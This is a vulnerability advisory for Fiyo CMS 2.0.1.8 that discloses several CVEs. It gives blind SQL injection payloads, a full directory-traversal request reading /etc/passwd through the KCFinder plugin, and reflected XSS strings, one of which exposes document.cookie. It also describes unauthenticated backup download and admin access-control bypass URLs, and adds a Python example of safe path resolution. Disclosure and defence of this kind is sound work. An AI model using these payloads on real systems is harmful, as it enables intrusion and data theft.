Fiyo CMS 2.0.1.8 Multiple Vulnerabilities (4)

Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT

--------------------------------------------------------------------
 Directory Traversal - kcfinder plugins - CVE-2014-1222
--------------------------------------------------------------------

Fiyo CMS was identified as using an outdated KCFinder plugin which is vulnerable to a directory traversal attack.

POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.248.132
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: ?type=files
Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

dir=files&file=../../../../../../../etc/passwd
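The request above succeeds because the download action joins the user-controlled `dir` and `file` parameters onto its base directory and serves whatever path results. As an added illustration (Python written for this page, not KCFinder's or Fiyo CMS's own PHP), the unsafe pattern is shown beside a resolver that enforces containment; the upload root path is an assumption.

```python
import os

# Illustrative code written for this page, not Fiyo CMS's or KCFinder's own
# source. The upload root below is an assumed location.
UPLOAD_ROOT = "/var/www/fiyo/uploads"


def vulnerable_resolve(upload_root, dir_param, file_param):
    """The unsafe pattern: user-controlled ``dir`` and ``file`` are joined
    onto the base directory and the result is served as-is. Seven ``../``
    segments, as in the advisory's request body, walk out of the root."""
    return os.path.normpath(os.path.join(upload_root, dir_param, file_param))


def safe_resolve(upload_root, dir_param, file_param):
    """Return the real path to serve, or None if the request must be refused.

    Two independent controls:
      1. ``file`` must be a bare file name (no separators, no '.'/'..',
         no NUL byte), so any traversal would have to come through ``dir``.
      2. The fully resolved candidate must lie inside the resolved root.
         os.path.commonpath is used instead of str.startswith so that a
         sibling such as ``uploads_evil`` is not mistaken for ``uploads``.
    """
    if not file_param or file_param in (".", ".."):
        return None
    if any(ch in file_param for ch in ("/", "\\", "\x00")):
        return None
    if "\x00" in dir_param:
        return None
    root = os.path.realpath(upload_root)
    # realpath follows symlinks, so a link planted inside the upload root
    # that points outside it is also caught by the containment check.
    # An absolute ``dir`` makes os.path.join discard the root entirely;
    # the commonpath comparison below rejects that case too.
    candidate = os.path.realpath(os.path.join(root, dir_param, file_param))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"   # body of the advisory's request
    print(vulnerable_resolve(UPLOAD_ROOT, "files", traversal))   # /etc/passwd
    print(safe_resolve(UPLOAD_ROOT, "files", traversal))         # None
    print(safe_resolve(UPLOAD_ROOT, "files", "report.pdf"))      # inside the root
```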

----------------------------------------------------
 Reflected XSS - CVE-2014-9146
----------------------------------------------------

?app=article&view=item31ab2"><script>alert(1)</script>0ccba&id=186
?app=article&view=item&id=18690fdb"><script>alert(1)</script>d99c9
?page=5eac15eac1"><script>alert(1)</script>774f2
?app=article95ce1"><script>alert(1)</script>298ab&view=item&id=186
?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5

----------------------------------------------------
 Direct URL Access - CVE-2014-9147
----------------------------------------------------
The database backup can be downloaded without any authentication:
[db_backup.sql filename]

----------------------------------------------------
 Access Control Bypass - CVE-2014-9148
----------------------------------------------------

An administrator-level user can reach the super administrator functions "Install & Update" and "Backup" by going directly to the URLs below:
  1. ?app=config&view=backup
  2. ?app=config&view=install

Recommendation:
Vendor patch:

Fiyo CMS
--------
The vendor has released an upgrade patch that fixes these security issues; download it from the vendor's homepage:
